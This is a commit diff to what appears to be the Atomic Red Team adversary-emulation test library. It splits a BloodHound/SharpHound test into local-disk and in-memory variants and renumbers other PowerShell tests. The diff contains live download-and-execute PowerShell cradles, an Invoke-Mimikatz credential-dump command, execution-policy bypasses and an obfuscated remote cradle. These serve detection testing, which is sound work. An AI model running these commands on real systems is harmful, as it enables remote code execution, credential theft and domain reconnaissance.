T1086 sharphound (#955)

* Updated T1086 - BloodHound/SharpHound Atomic Test I have modified T1086-2 to work more effectively. It now includes two test scenarios using SharpHound. 1. Using prereqs, will validate if sharphound.ps1 is found in the payloads directory within T1086 path. If not, it will download and store it locally. 2. Second test is a one liner that will download and run sharphound. Input arguments added for hitting a internal domain and specifying the output directory. * Generate docs from job=validate_atomics_generate_docs branch=T1086-sharphound * Added color It needed color. I added it. * Generate docs from job=validate_atomics_generate_docs branch=T1086-sharphound * Modified BloodHound Tests Broke out the two BloodHound tests. One will execute from local disk, other will be from within memory. Modified all payload paths to be from /src/ path. * Generate docs from job=validate_atomics_generate_docs branch=T1086-sharphound * Elevation Not Required Modified elevation, not required to be admin * Generate docs from job=validate_atomics_generate_docs branch=T1086-sharphound Co-authored-by: CircleCI Atomic Red Team doc generator <email> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2020-04-27 13:47:14 -06:00
parent c6582e3b48
commit e28da09de5
12 changed files with 257 additions and 115 deletions
@@ -480,18 +480,19 @@ execution,T1170,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload Wi
 execution,T1170,Mshta,2,Mshta executes VBScript to execute malicious command
 execution,T1170,Mshta,3,Mshta Executes Remote HTML Application (HTA)
 execution,T1086,PowerShell,1,Mimikatz
-execution,T1086,PowerShell,2,BloodHound
-execution,T1086,PowerShell,3,Obfuscation Tests
-execution,T1086,PowerShell,4,Mimikatz - Cradlecraft PsSendKeys
-execution,T1086,PowerShell,5,Invoke-AppPathBypass
-execution,T1086,PowerShell,6,Powershell MsXml COM object - no prompt
-execution,T1086,PowerShell,7,Powershell MsXml COM object - with prompt
-execution,T1086,PowerShell,8,Powershell XML requests
-execution,T1086,PowerShell,9,Powershell invoke mshta.exe download
-execution,T1086,PowerShell,10,Powershell Invoke-DownloadCradle
-execution,T1086,PowerShell,11,PowerShell Fileless Script Execution
-execution,T1086,PowerShell,12,PowerShell Downgrade Attack
-execution,T1086,PowerShell,13,NTFS Alternate Data Stream Access
+execution,T1086,PowerShell,2,Run BloodHound from local disk
+execution,T1086,PowerShell,3,Run Bloodhound from Memory using Download Cradle
+execution,T1086,PowerShell,4,Obfuscation Tests
+execution,T1086,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys
+execution,T1086,PowerShell,6,Invoke-AppPathBypass
+execution,T1086,PowerShell,7,Powershell MsXml COM object - no prompt
+execution,T1086,PowerShell,8,Powershell MsXml COM object - with prompt
+execution,T1086,PowerShell,9,Powershell XML requests
+execution,T1086,PowerShell,10,Powershell invoke mshta.exe download
+execution,T1086,PowerShell,11,Powershell Invoke-DownloadCradle
+execution,T1086,PowerShell,12,PowerShell Fileless Script Execution
+execution,T1086,PowerShell,13,PowerShell Downgrade Attack
+execution,T1086,PowerShell,14,NTFS Alternate Data Stream Access
 execution,T1121,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test
 execution,T1121,Regsvcs/Regasm,2,Regsvs Uninstall Method Call Test
 execution,T1117,Regsvr32,1,Regsvr32 local COM scriptlet execution
@@ -361,18 +361,19 @@ execution,T1170,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload Wi
 execution,T1170,Mshta,2,Mshta executes VBScript to execute malicious command
 execution,T1170,Mshta,3,Mshta Executes Remote HTML Application (HTA)
 execution,T1086,PowerShell,1,Mimikatz
-execution,T1086,PowerShell,2,BloodHound
-execution,T1086,PowerShell,3,Obfuscation Tests
-execution,T1086,PowerShell,4,Mimikatz - Cradlecraft PsSendKeys
-execution,T1086,PowerShell,5,Invoke-AppPathBypass
-execution,T1086,PowerShell,6,Powershell MsXml COM object - no prompt
-execution,T1086,PowerShell,7,Powershell MsXml COM object - with prompt
-execution,T1086,PowerShell,8,Powershell XML requests
-execution,T1086,PowerShell,9,Powershell invoke mshta.exe download
-execution,T1086,PowerShell,10,Powershell Invoke-DownloadCradle
-execution,T1086,PowerShell,11,PowerShell Fileless Script Execution
-execution,T1086,PowerShell,12,PowerShell Downgrade Attack
-execution,T1086,PowerShell,13,NTFS Alternate Data Stream Access
+execution,T1086,PowerShell,2,Run BloodHound from local disk
+execution,T1086,PowerShell,3,Run Bloodhound from Memory using Download Cradle
+execution,T1086,PowerShell,4,Obfuscation Tests
+execution,T1086,PowerShell,5,Mimikatz - Cradlecraft PsSendKeys
+execution,T1086,PowerShell,6,Invoke-AppPathBypass
+execution,T1086,PowerShell,7,Powershell MsXml COM object - no prompt
+execution,T1086,PowerShell,8,Powershell MsXml COM object - with prompt
+execution,T1086,PowerShell,9,Powershell XML requests
+execution,T1086,PowerShell,10,Powershell invoke mshta.exe download
+execution,T1086,PowerShell,11,Powershell Invoke-DownloadCradle
+execution,T1086,PowerShell,12,PowerShell Fileless Script Execution
+execution,T1086,PowerShell,13,PowerShell Downgrade Attack
+execution,T1086,PowerShell,14,NTFS Alternate Data Stream Access
 execution,T1121,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test
 execution,T1121,Regsvcs/Regasm,2,Regsvs Uninstall Method Call Test
 execution,T1117,Regsvr32,1,Regsvr32 local COM scriptlet execution
@@ -742,18 +742,19 @@
  - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](../../T1086/T1086.md)
  - Atomic Test #1: Mimikatz [windows]
-  - Atomic Test #2: BloodHound [windows]
-  - Atomic Test #3: Obfuscation Tests [windows]
-  - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
-  - Atomic Test #5: Invoke-AppPathBypass [windows]
-  - Atomic Test #6: Powershell MsXml COM object - no prompt [windows]
-  - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
-  - Atomic Test #8: Powershell XML requests [windows]
-  - Atomic Test #9: Powershell invoke mshta.exe download [windows]
-  - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
-  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
-  - Atomic Test #12: PowerShell Downgrade Attack [windows]
-  - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
+  - Atomic Test #2: Run BloodHound from local disk [windows]
+  - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
+  - Atomic Test #4: Obfuscation Tests [windows]
+  - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
+  - Atomic Test #6: Invoke-AppPathBypass [windows]
+  - Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
+  - Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
+  - Atomic Test #9: Powershell XML requests [windows]
+  - Atomic Test #10: Powershell invoke mshta.exe download [windows]
+  - Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
+  - Atomic Test #12: PowerShell Fileless Script Execution [windows]
+  - Atomic Test #13: PowerShell Downgrade Attack [windows]
+  - Atomic Test #14: NTFS Alternate Data Stream Access [windows]
 - [T1121 Regsvcs/Regasm](../../T1121/T1121.md)
  - Atomic Test #1: Regasm Uninstall Method Call Test [windows]
  - Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
@@ -616,18 +616,19 @@
  - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
 - [T1086 PowerShell](../../T1086/T1086.md)
  - Atomic Test #1: Mimikatz [windows]
-  - Atomic Test #2: BloodHound [windows]
-  - Atomic Test #3: Obfuscation Tests [windows]
-  - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
-  - Atomic Test #5: Invoke-AppPathBypass [windows]
-  - Atomic Test #6: Powershell MsXml COM object - no prompt [windows]
-  - Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
-  - Atomic Test #8: Powershell XML requests [windows]
-  - Atomic Test #9: Powershell invoke mshta.exe download [windows]
-  - Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
-  - Atomic Test #11: PowerShell Fileless Script Execution [windows]
-  - Atomic Test #12: PowerShell Downgrade Attack [windows]
-  - Atomic Test #13: NTFS Alternate Data Stream Access [windows]
+  - Atomic Test #2: Run BloodHound from local disk [windows]
+  - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
+  - Atomic Test #4: Obfuscation Tests [windows]
+  - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
+  - Atomic Test #6: Invoke-AppPathBypass [windows]
+  - Atomic Test #7: Powershell MsXml COM object - no prompt [windows]
+  - Atomic Test #8: Powershell MsXml COM object - with prompt [windows]
+  - Atomic Test #9: Powershell XML requests [windows]
+  - Atomic Test #10: Powershell invoke mshta.exe download [windows]
+  - Atomic Test #11: Powershell Invoke-DownloadCradle [windows]
+  - Atomic Test #12: PowerShell Fileless Script Execution [windows]
+  - Atomic Test #13: PowerShell Downgrade Attack [windows]
+  - Atomic Test #14: NTFS Alternate Data Stream Access [windows]
 - [T1121 Regsvcs/Regasm](../../T1121/T1121.md)
  - Atomic Test #1: Regasm Uninstall Method Call Test [windows]
  - Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
@@ -23332,26 +23332,67 @@ execution:
          Invoke-Mimikatz -DumpCreds"

 '
-    - name: BloodHound
-      description: |
-        Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
-
-        and then compress and store the data to the temp directory on the machine
+    - name: Run BloodHound from local disk
+      description: "Upon execution SharpHound will be downloaded to disk, imported
+        and executed. It will set up collection methods, run and then compress and
+        store the data to the temp directory on the machine. If system is unable to
+        contact a domain, proper execution will not occur.\n\nSuccessful execution
+        will produce stdout reporting LDAP connection was successful and BloodHound
+        domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip
+        file. \n"
      supported_platforms:
      - windows
      input_arguments:
-        bloodurl:
-          description: BloodHound URL
-          type: url
-          default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+        internal_domain:
+          description: Specify internal domain name to analyze
+          type: string
+          default: windomain.local
+        file_path:
+          description: File path for SharpHound payload
+          type: String
+          default: PathToAtomicsFolder\T1086\src
+        output_path:
+          description: Output path for BloodHound reports
+          type: String
+          default: PathToAtomicsFolder\T1086\src
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Validate if SharpHound.ps1 is located in #{file_path}.'
+        prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
+          {exit 1}'
+        get_prereq_command: Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
+          -OutFile "#{file_path}\SharpHound.ps1"
      executor:
        name: powershell
        elevation_required: false
-        command: 'IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
-          Invoke-BloodHound
-
-'
-        cleanup_command: 'Remove-Item $env:temp\*BloodHound.zip -Force
+        command: "write-host \"Import and Execution of SharpHound.ps1 from #{file_path}\"
+          -ForegroundColor Cyan\nimport-module #{file_path}\\SharpHound.ps1; invoke-bloodhound
+          -domain #{internal_domain} -OutputDirectory #{output_path}\n \n"
+        cleanup_command: |
+          Remove-Item #{file_path}\SharpHound.ps1 -Force
+          Remove-Item #{file_path}\*BloodHound.zip -Force
+    - name: Run Bloodhound from Memory using Download Cradle
+      description: "Upon execution SharpHound will load into memory and execute against
+        a domain. It will set up collection methods, run and then compress and store
+        the data to #{output_path}. If system is unable to contact a domain, proper
+        execution will not occur.\n\nSuccessful execution will produce stdout reporting
+        LDAP connection was successful and BloodHound domain enumeration is occurring.
+        Upon completion, final output will be a *BloodHound.zip file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Output path for BloodHound reports
+          type: String
+          default: PathToAtomicsFolder\T1086\src
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "write-host \"Remote download of SharpHound.ps1, import and execution
+          from $env:temp\" -ForegroundColor Cyan\npowershell -exec Bypass -C \"IEX(New-Object
+          Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound
+          -OutputDirectory #{output_path}\"\n \n"
+        cleanup_command: 'Remove-Item #{output_path}\*BloodHound.zip -Force

 '
    - name: Obfuscation Tests
@@ -23416,7 +23457,7 @@ execution:
        url:
          description: url of payload to execute
          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
      executor:
        name: command_prompt
        elevation_required: false
@@ -23429,14 +23470,14 @@ execution:
      description: |
        Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.

-        Provided by https://github.com/mgreen27/mgreen27.github.i
+        Provided by https://github.com/mgreen27/mgreen27.github.io
      supported_platforms:
      - windows
      input_arguments:
        url:
          description: url of payload to execute
          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
      executor:
        name: command_prompt
        elevation_required: false
@@ -23456,7 +23497,7 @@ execution:
        url:
          description: url of payload to execute
          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml
      executor:
        name: command_prompt
        elevation_required: false
@@ -23476,7 +23517,7 @@ execution:
        url:
          description: url of payload to execute
          type: url
-          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct
      executor:
        name: command_prompt
        elevation_required: false
@@ -14,29 +14,31 @@ PowerShell commands/scripts can also be executed without directly invoking the p

 - [Atomic Test #1 - Mimikatz](#atomic-test-1---mimikatz)

- [Atomic Test #2 - BloodHound](#atomic-test-2---bloodhound)
+- [Atomic Test #2 - Run BloodHound from local disk](#atomic-test-2---run-bloodhound-from-local-disk)

- [Atomic Test #3 - Obfuscation Tests](#atomic-test-3---obfuscation-tests)
+- [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle)

- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys)
+- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests)

- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass)
+- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys)

- [Atomic Test #6 - Powershell MsXml COM object - no prompt](#atomic-test-6---powershell-msxml-com-object---no-prompt)
+- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass)

- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt)
+- [Atomic Test #7 - Powershell MsXml COM object - no prompt](#atomic-test-7---powershell-msxml-com-object---no-prompt)

- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
+- [Atomic Test #8 - Powershell MsXml COM object - with prompt](#atomic-test-8---powershell-msxml-com-object---with-prompt)

- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
+- [Atomic Test #9 - Powershell XML requests](#atomic-test-9---powershell-xml-requests)

- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
+- [Atomic Test #10 - Powershell invoke mshta.exe download](#atomic-test-10---powershell-invoke-mshtaexe-download)

- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution)
+- [Atomic Test #11 - Powershell Invoke-DownloadCradle](#atomic-test-11---powershell-invoke-downloadcradle)

- [Atomic Test #12 - PowerShell Downgrade Attack](#atomic-test-12---powershell-downgrade-attack)
+- [Atomic Test #12 - PowerShell Fileless Script Execution](#atomic-test-12---powershell-fileless-script-execution)

- [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access)
+- [Atomic Test #13 - PowerShell Downgrade Attack](#atomic-test-13---powershell-downgrade-attack)
+
+- [Atomic Test #14 - NTFS Alternate Data Stream Access](#atomic-test-14---ntfs-alternate-data-stream-access)


 <br/>
@@ -70,10 +72,10 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
 <br/>
 <br/>

-## Atomic Test #2 - BloodHound
-Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+## Atomic Test #2 - Run BloodHound from local disk
+Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.

-and then compress and store the data to the temp directory on the machine
+Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 

 **Supported Platforms:** Windows

@@ -83,19 +85,71 @@ and then compress and store the data to the temp directory on the machine
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1|
+| internal_domain | Specify internal domain name to analyze | string | windomain.local|
+| file_path | File path for SharpHound payload | String | PathToAtomicsFolder&#92;T1086&#92;src|
+| output_path | Output path for BloodHound reports | String | PathToAtomicsFolder&#92;T1086&#92;src|


 #### Attack Commands: Run with `powershell`! 


 ```powershell
-IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
 ```

 #### Cleanup Commands:
 ```powershell
-Remove-Item $env:temp\*BloodHound.zip -Force
+Remove-Item #{file_path}\SharpHound.ps1 -Force
+Remove-Item #{file_path}\*BloodHound.zip -Force
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Validate if SharpHound.ps1 is located in #{file_path}.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle
+Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
+
+Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_path | Output path for BloodHound reports | String | PathToAtomicsFolder&#92;T1086&#92;src|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{output_path}\*BloodHound.zip -Force
 ```


@@ -105,7 +159,7 @@ Remove-Item $env:temp\*BloodHound.zip -Force
 <br/>
 <br/>

-## Atomic Test #3 - Obfuscation Tests
+## Atomic Test #4 - Obfuscation Tests
 Different obfuscated methods to test
 Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"

@@ -132,7 +186,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
 <br/>
 <br/>

-## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
+## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys
 Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.

 **Supported Platforms:** Windows
@@ -156,7 +210,7 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
 <br/>
 <br/>

-## Atomic Test #5 - Invoke-AppPathBypass
+## Atomic Test #6 - Invoke-AppPathBypass
 Note: Windows 10 only
 Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
 Upon execution windows backup and restore window will be opened
@@ -182,7 +236,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
 <br/>
 <br/>

-## Atomic Test #6 - Powershell MsXml COM object - no prompt
+## Atomic Test #7 - Powershell MsXml COM object - no prompt
 Provided by https://github.com/mgreen27/mgreen27.github.io
 Powershell MsXml COM object.
 Not proxy aware removing cache although does not appear to write to those locations
@@ -195,7 +249,7 @@ Not proxy aware removing cache although does not appear to write to those locati
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|


 #### Attack Commands: Run with `command_prompt`! 
@@ -213,10 +267,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
 <br/>
 <br/>

-## Atomic Test #7 - Powershell MsXml COM object - with prompt
+## Atomic Test #8 - Powershell MsXml COM object - with prompt
 Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.

-Provided by https://github.com/mgreen27/mgreen27.github.i
+Provided by https://github.com/mgreen27/mgreen27.github.io

 **Supported Platforms:** Windows

@@ -226,7 +280,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.i
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1|


 #### Attack Commands: Run with `command_prompt`! 
@@ -244,7 +298,7 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
 <br/>
 <br/>

-## Atomic Test #8 - Powershell XML requests
+## Atomic Test #9 - Powershell XML requests
 Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.

 Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -257,7 +311,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.xml|


 #### Attack Commands: Run with `command_prompt`! 
@@ -275,7 +329,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 <br/>
 <br/>

-## Atomic Test #9 - Powershell invoke mshta.exe download
+## Atomic Test #10 - Powershell invoke mshta.exe download
 Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".

 Provided by https://github.com/mgreen27/mgreen27.github.io
@@ -288,7 +342,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
+| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/mshta.sct|


 #### Attack Commands: Run with `command_prompt`! 
@@ -306,7 +360,7 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
 <br/>
 <br/>

-## Atomic Test #10 - Powershell Invoke-DownloadCradle
+## Atomic Test #11 - Powershell Invoke-DownloadCradle
 Provided by https://github.com/mgreen27/mgreen27.github.io
 Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.

@@ -328,7 +382,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 <br/>
 <br/>

-## Atomic Test #11 - PowerShell Fileless Script Execution
+## Atomic Test #12 - PowerShell Fileless Script Execution
 Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
 art-marker.txt is in the folder.

@@ -360,7 +414,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
 <br/>
 <br/>

-## Atomic Test #12 - PowerShell Downgrade Attack
+## Atomic Test #13 - PowerShell Downgrade Attack
 Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/

 **Supported Platforms:** Windows
@@ -396,7 +450,7 @@ Write-Host  Automated installer not implemented yet, please install PowerShell v
 <br/>
 <br/>

-## Atomic Test #13 - NTFS Alternate Data Stream Access
+## Atomic Test #14 - NTFS Alternate Data Stream Access
 Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.

 **Supported Platforms:** Windows
@@ -19,25 +19,68 @@ atomic_tests:
    command: |
      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"

- name: BloodHound
+- name: Run BloodHound from local disk 
  description: |
-    Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run,
+    Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.

-    and then compress and store the data to the temp directory on the machine
+    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 
  supported_platforms:
    - windows
  input_arguments:
-    bloodurl:
-      description: BloodHound URL
-      type: url
-      default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1
+    internal_domain:
+      description: Specify internal domain name to analyze
+      type: string
+      default: windomain.local
+    file_path:
+      description: File path for SharpHound payload
+      type: String
+      default: PathToAtomicsFolder\T1086\src
+    output_path:
+      description: Output path for BloodHound reports
+      type: String
+      default: PathToAtomicsFolder\T1086\src
+  
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+        Validate if SharpHound.ps1 is located in #{file_path}.
+      prereq_command: |
+        if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
+
  executor:
    name: powershell
    elevation_required: false
    command: |
-      IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound
+      write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
+      import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain #{internal_domain} -OutputDirectory #{output_path}
+       
    cleanup_command: |
-      Remove-Item $env:temp\*BloodHound.zip -Force
+      Remove-Item #{file_path}\SharpHound.ps1 -Force
+      Remove-Item #{file_path}\*BloodHound.zip -Force
+
+- name: Run Bloodhound from Memory using Download Cradle
+  description: |
+    Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to #{output_path}. If system is unable to contact a domain, proper execution will not occur.
+
+    Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file. 
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_path:
+      description: Output path for BloodHound reports
+      type: String
+      default: PathToAtomicsFolder\T1086\src
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      write-host "Remote download of SharpHound.ps1, import and execution from $env:temp" -ForegroundColor Cyan
+      powershell -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');Invoke-BloodHound -OutputDirectory #{output_path}"
+       
+    cleanup_command: |
+      Remove-Item #{output_path}\*BloodHound.zip -Force

 - name: Obfuscation Tests
  description: |
@@ -88,7 +131,7 @@ atomic_tests:
    url:
      description: url of payload to execute
      type: url
-      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/src/test.ps1
  executor:
    name: command_prompt
    elevation_required: false
@@ -99,14 +142,14 @@ atomic_tests:
  description: |
